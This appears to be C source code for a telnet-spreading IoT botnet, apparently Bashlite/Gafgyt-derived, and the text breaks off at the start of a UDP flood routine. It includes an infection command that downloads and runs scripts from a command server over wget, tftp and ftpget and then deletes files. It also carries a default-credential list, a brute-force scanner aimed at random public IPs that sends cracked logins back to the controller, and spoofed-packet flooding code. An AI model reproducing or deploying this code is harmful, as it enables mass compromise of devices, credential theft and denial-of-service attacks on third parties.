#define PR_SET_NAME 15#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(un

1. #define PR_SET_NAME 15
2. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
3. #define PAD_RIGHT 1
4. #define PAD_ZERO 2
5. #define PRINT_BUF_LEN 12
6. #define CMD_IAC 255
7. #define CMD_WILL 251
8. #define CMD_WONT 252
9. #define CMD_DO 253
10. #define CMD_DONT 254
11. #define OPT_SGA 3
12.  
13. #include <stdlib.h>
14. #include <stdarg.h>
15. #include <stdio.h>
16. #include <sys/socket.h>
17. #include <sys/types.h>
18. #include <netinet/in.h>
19. #include <arpa/inet.h>
20. #include <netdb.h>
21. #include <signal.h>
22. #include <strings.h>
23. #include <string.h>
24. #include <sys/utsname.h>
25. #include <unistd.h>
26. #include <fcntl.h>
27. #include <errno.h>
28. #include <netinet/ip.h>
29. #include <netinet/udp.h>
30. #include <netinet/tcp.h>
31. #include <sys/wait.h>
32. #include <sys/ioctl.h>
33. #include <net/if.h>
34.  
35. char *infectline = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://"+ ip +"/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp "+ ip +" -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g "+ ip +"; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 "+ ip +" ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit\r\n";
36.  
37. // WGET LINE GOES HERE ^
38.  
39. unsigned char *commServer[] =
40. {
41. ""+ ip +":23"
42. };
43.  
44. int initConnection();
45. int getBogos(unsigned char *bogomips);
46. int getCores();
47. int getCountry(unsigned char *buf, int bufsize);
48. void makeRandomStr(unsigned char *buf, int length);
49. int sockprintf(int sock, char *formatStr, ...);
50. char *inet_ntoa(struct in_addr in);
51.  
52. int mainCommSock = 0, currentServer = -1, gotIP = 0;
53. uint32_t *pids;
54. uint32_t scanPid;
55. uint64_t numpids = 0;
56. struct in_addr ourIP;
57. unsigned char macAddress[6] = {0};
58. char *usernames[] = {"root\0", "admin\0", "user\0", "login\0", "guest\0", "support\0"};
59. char *passwords[] = {"root\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "\0", "password\0", "support\0"};
60.  
61. #define PHI 0x9e3779b9
62. static uint32_t Q[4096], c = 362436;
63.  
64. void init_rand(uint32_t x)
65. {
66. int i;
67.  
68. Q[0] = x;
69. Q[1] = x + PHI;
70. Q[2] = x + PHI + PHI;
71.  
72. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
73. }
74.  
75. uint32_t rand_cmwc(void)
76. {
77. uint64_t t, a = 18782LL;
78. static uint32_t i = 4095;
79. uint32_t x, r = 0xfffffffe;
80. i = (i + 1) & 4095;
81. t = a * Q[i] + c;
82. c = (uint32_t)(t >> 32);
83. x = t + c;
84. if (x < c) {
85. x++;
86. c++;
87. }
88. return (Q[i] = r - x);
89. }
90.  
91. void trim(char *str)
92. {
93. int i;
94. int begin = 0;
95. int end = strlen(str) - 1;
96.  
97. while (isspace(str[begin])) begin++;
98.  
99. while ((end >= begin) && isspace(str[end])) end--;
100. for (i = begin; i <= end; i++) str[i - begin] = str[i];
101.  
102. str[i - begin] = '\0';
103. }
104.  
105. static void printchar(unsigned char **str, int c)
106. {
107. if (str) {
108. **str = c;
109. ++(*str);
110. }
111. else (void)write(1, &c, 1);
112. }
113.  
114. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
115. {
116. register int pc = 0, padchar = ' ';
117.  
118. if (width > 0) {
119. register int len = 0;
120. register const unsigned char *ptr;
121. for (ptr = string; *ptr; ++ptr) ++len;
122. if (len >= width) width = 0;
123. else width -= len;
124. if (pad & PAD_ZERO) padchar = '0';
125. }
126. if (!(pad & PAD_RIGHT)) {
127. for ( ; width > 0; --width) {
128. printchar (out, padchar);
129. ++pc;
130. }
131. }
132. for ( ; *string ; ++string) {
133. printchar (out, *string);
134. ++pc;
135. }
136. for ( ; width > 0; --width) {
137. printchar (out, padchar);
138. ++pc;
139. }
140.  
141. return pc;
142. }
143.  
144. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
145. {
146. unsigned char print_buf[PRINT_BUF_LEN];
147. register unsigned char *s;
148. register int t, neg = 0, pc = 0;
149. register unsigned int u = i;
150.  
151. if (i == 0) {
152. print_buf[0] = '0';
153. print_buf[1] = '\0';
154. return prints (out, print_buf, width, pad);
155. }
156.  
157. if (sg && b == 10 && i < 0) {
158. neg = 1;
159. u = -i;
160. }
161.  
162. s = print_buf + PRINT_BUF_LEN-1;
163. *s = '\0';
164.  
165. while (u) {
166. t = u % b;
167. if( t >= 10 )
168. t += letbase - '0' - 10;
169. *--s = t + '0';
170. u /= b;
171. }
172.  
173. if (neg) {
174. if( width && (pad & PAD_ZERO) ) {
175. printchar (out, '-');
176. ++pc;
177. --width;
178. }
179. else {
180. *--s = '-';
181. }
182. }
183.  
184. return pc + prints (out, s, width, pad);
185. }
186.  
187. static int print(unsigned char **out, const unsigned char *format, va_list args )
188. {
189. register int width, pad;
190. register int pc = 0;
191. unsigned char scr[2];
192.  
193. for (; *format != 0; ++format) {
194. if (*format == '%') {
195. ++format;
196. width = pad = 0;
197. if (*format == '\0') break;
198. if (*format == '%') goto out;
199. if (*format == '-') {
200. ++format;
201. pad = PAD_RIGHT;
202. }
203. while (*format == '0') {
204. ++format;
205. pad |= PAD_ZERO;
206. }
207. for ( ; *format >= '0' && *format <= '9'; ++format) {
208. width *= 10;
209. width += *format - '0';
210. }
211. if( *format == 's' ) {
212. register char *s = (char *)va_arg( args, int );
213. pc += prints (out, s?s:"(null)", width, pad);
214. continue;
215. }
216. if( *format == 'd' ) {
217. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
218. continue;
219. }
220. if( *format == 'x' ) {
221. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
222. continue;
223. }
224. if( *format == 'X' ) {
225. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
226. continue;
227. }
228. if( *format == 'u' ) {
229. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
230. continue;
231. }
232. if( *format == 'c' ) {
233. scr[0] = (unsigned char)va_arg( args, int );
234. scr[1] = '\0';
235. pc += prints (out, scr, width, pad);
236. continue;
237. }
238. }
239. else {
240. out:
241. printchar (out, *format);
242. ++pc;
243. }
244. }
245. if (out) **out = '\0';
246. va_end( args );
247. return pc;
248. }
249.  
250. int zprintf(const unsigned char *format, ...)
251. {
252. va_list args;
253. va_start( args, format );
254. return print( 0, format, args );
255. }
256.  
257. int szprintf(unsigned char *out, const unsigned char *format, ...)
258. {
259. va_list args;
260. va_start( args, format );
261. return print( &out, format, args );
262. }
263.  
264.  
265. int sockprintf(int sock, char *formatStr, ...)
266. {
267. unsigned char *textBuffer = malloc(2048);
268. memset(textBuffer, 0, 2048);
269. char *orig = textBuffer;
270. va_list args;
271. va_start(args, formatStr);
272. print(&textBuffer, formatStr, args);
273. va_end(args);
274. orig[strlen(orig)] = '\n';
275. zprintf("buf: %s\n", orig);
276. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
277. free(orig);
278. return q;
279. }
280.  
281. static int *fdopen_pids;
282.  
283. int fdpopen(unsigned char *program, register unsigned char *type)
284. {
285. register int iop;
286. int pdes[2], fds, pid;
287.  
288. if (*type != 'r' && *type != 'w' || type[1]) return -1;
289.  
290. if (pipe(pdes) < 0) return -1;
291. if (fdopen_pids == NULL) {
292. if ((fds = getdtablesize()) <= 0) return -1;
293. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
294. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
295. }
296.  
297. switch (pid = vfork())
298. {
299. case -1:
300. close(pdes[0]);
301. close(pdes[1]);
302. return -1;
303. case 0:
304. if (*type == 'r') {
305. if (pdes[1] != 1) {
306. dup2(pdes[1], 1);
307. close(pdes[1]);
308. }
309. close(pdes[0]);
310. } else {
311. if (pdes[0] != 0) {
312. (void) dup2(pdes[0], 0);
313. (void) close(pdes[0]);
314. }
315. (void) close(pdes[1]);
316. }
317. execl("/bin/sh", "sh", "-c", program, NULL);
318. _exit(127);
319. }
320. if (*type == 'r') {
321. iop = pdes[0];
322. (void) close(pdes[1]);
323. } else {
324. iop = pdes[1];
325. (void) close(pdes[0]);
326. }
327. fdopen_pids[iop] = pid;
328. return (iop);
329. }
330.  
331. int fdpclose(int iop)
332. {
333. register int fdes;
334. sigset_t omask, nmask;
335. int pstat;
336. register int pid;
337.  
338. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
339. (void) close(iop);
340. sigemptyset(&nmask);
341. sigaddset(&nmask, SIGINT);
342. sigaddset(&nmask, SIGQUIT);
343. sigaddset(&nmask, SIGHUP);
344. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
345. do {
346. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
347. } while (pid == -1 && errno == EINTR);
348. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
349. fdopen_pids[fdes] = 0;
350. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
351. }
352.  
353. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
354. {
355. int got = 1, total = 0;
356. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
357. return got == 0 ? NULL : buffer;
358. }
359.  
360. static const long hextable[] = {
361. [0 ... 255] = -1,
362. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
363. ['A'] = 10, 11, 12, 13, 14, 15,
364. ['a'] = 10, 11, 12, 13, 14, 15
365. };
366.  
367. long parseHex(unsigned char *hex)
368. {
369. long ret = 0;
370. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
371. return ret;
372. }
373.  
374. int wildString(const unsigned char* pattern, const unsigned char* string) {
375. switch(*pattern)
376. {
377. case '\0': return *string;
378. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
379. case '?': return !(*string && !wildString(pattern+1, string+1));
380. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
381. }
382. }
383.  
384. int getHost(unsigned char *toGet, struct in_addr *i)
385. {
386. struct hostent *h;
387. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
388. return 0;
389. }
390.  
391. void uppercase(unsigned char *str)
392. {
393. while(*str) { *str = toupper(*str); str++; }
394. }
395.  
396. int getBogos(unsigned char *bogomips)
397. {
398. int cmdline = open("/proc/cpuinfo", O_RDONLY);
399. char linebuf[4096];
400. while(fdgets(linebuf, 4096, cmdline) != NULL)
401. {
402. uppercase(linebuf);
403. if(strstr(linebuf, "BOGOMIPS") == linebuf)
404. {
405. unsigned char *pos = linebuf + 8;
406. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
407. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
408. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
409. strcpy(bogomips, pos);
410. close(cmdline);
411. return 0;
412. }
413. memset(linebuf, 0, 4096);
414. }
415. close(cmdline);
416. return 1;
417. }
418.  
419. int getCores()
420. {
421. int totalcores = 0;
422. int cmdline = open("/proc/cpuinfo", O_RDONLY);
423. char linebuf[4096];
424. while(fdgets(linebuf, 4096, cmdline) != NULL)
425. {
426. uppercase(linebuf);
427. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
428. memset(linebuf, 0, 4096);
429. }
430. close(cmdline);
431. return totalcores;
432.  
433. }
434.  
435. void makeRandomStr(unsigned char *buf, int length)
436. {
437. int i = 0;
438. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
439. }
440.  
441. int recvLine(int socket, unsigned char *buf, int bufsize)
442. {
443. memset(buf, 0, bufsize);
444.  
445. fd_set myset;
446. struct timeval tv;
447. tv.tv_sec = 30;
448. tv.tv_usec = 0;
449. FD_ZERO(&myset);
450. FD_SET(socket, &myset);
451. int selectRtn, retryCount;
452. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
453. while(retryCount < 10)
454. {
455. sockprintf(mainCommSock, "PING");
456.  
457. tv.tv_sec = 30;
458. tv.tv_usec = 0;
459. FD_ZERO(&myset);
460. FD_SET(socket, &myset);
461. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
462. retryCount++;
463. continue;
464. }
465.  
466. break;
467. }
468. }
469.  
470. unsigned char tmpchr;
471. unsigned char *cp;
472. int count = 0;
473.  
474. cp = buf;
475. while(bufsize-- > 1)
476. {
477. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
478. *cp = 0x00;
479. return -1;
480. }
481. *cp++ = tmpchr;
482. if(tmpchr == '\n') break;
483. count++;
484. }
485. *cp = 0x00;
486.  
487. // zprintf("recv: %s\n", cp);
488.  
489. return count;
490. }
491.  
492. int connectTimeout(int fd, char *host, int port, int timeout)
493. {
494. struct sockaddr_in dest_addr;
495. fd_set myset;
496. struct timeval tv;
497. socklen_t lon;
498.  
499. int valopt;
500. long arg = fcntl(fd, F_GETFL, NULL);
501. arg |= O_NONBLOCK;
502. fcntl(fd, F_SETFL, arg);
503.  
504. dest_addr.sin_family = AF_INET;
505. dest_addr.sin_port = htons(port);
506. if(getHost(host, &dest_addr.sin_addr)) return 0;
507. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
508. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
509.  
510. if (res < 0) {
511. if (errno == EINPROGRESS) {
512. tv.tv_sec = timeout;
513. tv.tv_usec = 0;
514. FD_ZERO(&myset);
515. FD_SET(fd, &myset);
516. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
517. lon = sizeof(int);
518. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
519. if (valopt) return 0;
520. }
521. else return 0;
522. }
523. else return 0;
524. }
525.  
526. arg = fcntl(fd, F_GETFL, NULL);
527. arg &= (~O_NONBLOCK);
528. fcntl(fd, F_SETFL, arg);
529.  
530. return 1;
531. }
532.  
533. int listFork()
534. {
535. uint32_t parent, *newpids, i;
536. parent = fork();
537. if (parent <= 0) return parent;
538. numpids++;
539. newpids = (uint32_t*)malloc((numpids + 1) * 4);
540. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
541. newpids[numpids - 1] = parent;
542. free(pids);
543. pids = newpids;
544. return parent;
545. }
546.  
547. int negotiate(int sock, unsigned char *buf, int len)
548. {
549. unsigned char c;
550.  
551. switch (buf[1]) {
552. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
553. case CMD_WILL:
554. case CMD_WONT:
555. case CMD_DO:
556. case CMD_DONT:
557. c = CMD_IAC;
558. send(sock, &c, 1, MSG_NOSIGNAL);
559. if (CMD_WONT == buf[1]) c = CMD_DONT;
560. else if (CMD_DONT == buf[1]) c = CMD_WONT;
561. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
562. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
563. send(sock, &c, 1, MSG_NOSIGNAL);
564. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
565. break;
566.  
567. default:
568. break;
569. }
570.  
571. return 0;
572. }
573.  
574. int matchPrompt(char *bufStr)
575. {
576. char *prompts = ":>%$#\0";
577.  
578. int bufLen = strlen(bufStr);
579. int i, q = 0;
580. for(i = 0; i < strlen(prompts); i++)
581. {
582. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
583. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
584. }
585.  
586. return 0;
587. }
588.  
589. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
590. {
591. int bufferUsed = initialIndex, got = 0, found = 0;
592. fd_set myset;
593. struct timeval tv;
594. tv.tv_sec = timeout;
595. tv.tv_usec = timeoutusec;
596. unsigned char *initialRead = NULL;
597.  
598. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
599. {
600. FD_ZERO(&myset);
601. FD_SET(fd, &myset);
602. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
603. initialRead = buffer + bufferUsed;
604. got = recv(fd, initialRead, 1, 0);
605. if(got == -1 || got == 0) return 0;
606. bufferUsed += got;
607. if(*initialRead == 0xFF)
608. {
609. got = recv(fd, initialRead + 1, 2, 0);
610. if(got == -1 || got == 0) return 0;
611. bufferUsed += got;
612. if(!negotiate(fd, initialRead, 3)) return 0;
613. } else {
614. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
615. }
616. }
617.  
618. if(found) return 1;
619. return 0;
620. }
621.  
622. static uint8_t ipState[5];
623. in_addr_t getRandomPublicIP()
624. {
625. if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
626. {
627. ipState[1]++;
628. ipState[2]++;
629. ipState[3]++;
630. ipState[4]++;
631. char ip[16];
632. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
633. return inet_addr(ip);
634. }
635.  
636. ipState[1] = 0;
637. ipState[2] = 0;
638. ipState[3] = 0;
639. ipState[4] = 0;
640. while(
641. (ipState[1] == 0) ||
642. (ipState[1] == 10) ||
643. (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
644. (ipState[1] == 127) ||
645. (ipState[1] == 169 && ipState[2] == 254) ||
646. (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
647. (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
648. (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
649. (ipState[1] == 192 && ipState[2] == 168) ||
650. (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
651. (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
652. (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
653. (ipState[1] >= 224)
654. )
655. {
656. ipState[1] = rand() % 150;
657. ipState[2] = rand() % 150;
658. ipState[3] = rand() % 150;
659. ipState[4] = rand() % 150;
660. }
661.  
662. char ip[16];
663. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
664. return inet_addr(ip);
665. }
666.  
667. in_addr_t getRandomIP(in_addr_t netmask)
668. {
669. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
670. return tmp ^ ( rand_cmwc() & ~netmask);
671. }
672.  
673. unsigned short csum (unsigned short *buf, int count)
674. {
675. register uint64_t sum = 0;
676. while( count > 1 ) { sum += *buf++; count -= 2; }
677. if(count > 0) { sum += *(unsigned char *)buf; }
678. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
679. return (uint16_t)(~sum);
680. }
681.  
682. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
683. {
684.  
685. struct tcp_pseudo
686. {
687. unsigned long src_addr;
688. unsigned long dst_addr;
689. unsigned char zero;
690. unsigned char proto;
691. unsigned short length;
692. } pseudohead;
693. unsigned short total_len = iph->tot_len;
694. pseudohead.src_addr=iph->saddr;
695. pseudohead.dst_addr=iph->daddr;
696. pseudohead.zero=0;
697. pseudohead.proto=IPPROTO_TCP;
698. pseudohead.length=htons(sizeof(struct tcphdr));
699. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
700. unsigned short *tcp = malloc(totaltcp_len);
701. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
702. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
703. unsigned short output = csum(tcp,totaltcp_len);
704. free(tcp);
705. return output;
706. }
707.  
708. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
709. {
710. iph->ihl = 5;
711. iph->version = 4;
712. iph->tos = 0;
713. iph->tot_len = sizeof(struct iphdr) + packetSize;
714. iph->id = rand_cmwc();
715. iph->frag_off = 0;
716. iph->ttl = MAXTTL;
717. iph->protocol = protocol;
718. iph->check = 0;
719. iph->saddr = source;
720. iph->daddr = dest;
721. }
722.  
723. int sclose(int fd)
724. {
725. if(3 > fd) return 1;
726. close(fd);
727. return 0;
728. }
729.  
730. void StartTheLelz()
731. {
732. int max = (getdtablesize() / 4) * 3, i, res;
733. fd_set myset;
734. struct timeval tv;
735. socklen_t lon;
736. int valopt;
737.  
738. max = max > 4096 ? 4096 : max;
739.  
740. struct sockaddr_in dest_addr;
741. dest_addr.sin_family = AF_INET;
742. dest_addr.sin_port = htons(23);
743. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
744.  
745. struct telstate_t
746. {
747. int fd;
748. uint32_t ip;
749. uint8_t state;
750. uint8_t complete;
751. uint8_t usernameInd;
752. uint8_t passwordInd;
753. uint32_t totalTimeout;
754. uint16_t bufUsed;
755. char *sockbuf;
756. } fds[max];
757. memset(fds, 0, max * (sizeof(int) + 1));
758. for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
759. struct timeval timeout;
760. timeout.tv_sec = 5;
761. timeout.tv_usec = 0;
762. while(1)
763. {
764. for(i = 0; i < max; i++)
765. {
766. switch(fds[i].state)
767. {
768. case 0:
769. {
770. memset(fds[i].sockbuf, 0, 1024);
771.  
772. if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
773. else {
774. fds[i].passwordInd++;
775. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
776. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
777. }
778. dest_addr.sin_family = AF_INET;
779. dest_addr.sin_port = htons(23);
780. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
781. dest_addr.sin_addr.s_addr = fds[i].ip;
782. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
783. setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));
784. setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
785. if(fds[i].fd == -1) { continue; }
786. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
787. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf("close %lu\n",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; }
788. else { fds[i].state = 1; fds[i].totalTimeout = 0; }
789. }
790. break;
791.  
792. case 1:
793. {
794. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
795.  
796. FD_ZERO(&myset);
797. FD_SET(fds[i].fd, &myset);
798. tv.tv_sec = 0;
799. tv.tv_usec = 10000;
800. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
801. if(res == 1)
802. {
803. lon = sizeof(int);
804. valopt = 0;
805. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
806. if(valopt)
807. {
808. sclose(fds[i].fd);
809. fds[i].state = 0;
810. fds[i].complete = 1;
811. } else {
812. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
813. fds[i].totalTimeout = 0;
814. fds[i].bufUsed = 0;
815. memset(fds[i].sockbuf, 0, 1024);
816. fds[i].state = 2;
817. continue;
818. }
819. } else if(res == -1)
820. {
821. sclose(fds[i].fd);
822. fds[i].state = 0;
823. fds[i].complete = 1;
824. }
825.  
826. if(fds[i].totalTimeout + 5 < time(NULL)) //was if(fds[i].totalTimeout + 5 < time(NULL))
827. {
828. sclose(fds[i].fd);
829. fds[i].state = 0;
830. fds[i].complete = 1;
831. }
832. }
833. break;
834.  
835. case 2:
836. {
837. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
838. if(matchPrompt(fds[i].sockbuf)) {
839. fds[i].state = 7;
840. }
841.  
842. if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
843. {
844. fds[i].totalTimeout = 0;
845. fds[i].bufUsed = 0;
846. memset(fds[i].sockbuf, 0, 1024);
847. fds[i].state = 3;
848. continue;
849. } else {
850. fds[i].bufUsed = strlen(fds[i].sockbuf);
851. }
852.  
853. if(fds[i].totalTimeout + 30 < time(NULL))
854. {
855. sclose(fds[i].fd);
856. fds[i].state = 0;
857. fds[i].complete = 1;
858. }
859. }
860. break;
861.  
862. case 3:
863. {
864. if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
865. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
866. fds[i].state = 4;
867. }
868. break;
869.  
870. case 4:
871. {
872. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
873.  
874. if(readUntil(fds[i].fd, "assword:", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
875. {
876. fds[i].totalTimeout = 0;
877. fds[i].bufUsed = 0;
878. if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5;
879. else fds[i].state = 7;
880. memset(fds[i].sockbuf, 0, 1024);
881. continue;
882. } else {
883. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
884. fds[i].bufUsed = strlen(fds[i].sockbuf);
885. }
886.  
887. if(fds[i].totalTimeout + 8 < time(NULL)) //was if(fds[i].totalTimeout + 8 < time(NULL))
888. {
889. sclose(fds[i].fd);
890. fds[i].state = 0;
891. fds[i].complete = 1;
892. }
893. }
894. break;
895.  
896. case 5:
897. {
898. if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
899. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
900. fds[i].state = 6;
901. }
902. break;
903.  
904. case 6:
905. {
906. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
907.  
908. if(readUntil(fds[i].fd, "ncorrect", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
909. {
910. fds[i].totalTimeout = 0;
911. fds[i].bufUsed = 0;
912. if(strstr(fds[i].sockbuf, "ncorrect") != NULL) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; }
913. if(!matchPrompt(fds[i].sockbuf)) { memset(fds[i].sockbuf, 0, 1024); sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
914. else fds[i].state = 7;
915. memset(fds[i].sockbuf, 0, 1024);
916. continue;
917. } else {
918. fds[i].bufUsed = strlen(fds[i].sockbuf);
919. }
920.  
921. if(fds[i].totalTimeout + 30 < time(NULL))
922. {
923. sclose(fds[i].fd);
924. fds[i].state = 0;
925. fds[i].complete = 1;
926. }
927. }
928. break;
929.  
930. case 7:
931. {
932. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
933. fds[i].state = 8;
934. }
935. break;
936.  
937. case 8:
938. {
939. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
940.  
941. if(send(fds[i].fd, infectline, strlen(infectline), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; memset(fds[i].sockbuf, 0, 1024); continue; }
942. sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
943.  
944. if(fds[i].totalTimeout + 8 < time(NULL))
945. {
946. sclose(fds[i].fd);
947. fds[i].state = 0;
948. fds[i].complete = 1;
949. }
950. }
951. break;
952. }
953. }
954. }
955. }
956.  
957. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
958. {
959. struct sockaddr_in dest_addr;
960.  
961. dest_addr.sin_family = AF_INET;
962. if(port == 0) dest_addr.sin_port = rand_cmwc();
963. else dest_addr.sin_port = htons(port);
964. if(getHost(target, &dest_addr.sin_addr)) return;
965. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
966.  
967. register unsigned int pollRegister;
968. pollRegister = pollinterval;
969.  
970. if(spoofit == 32)
971. {
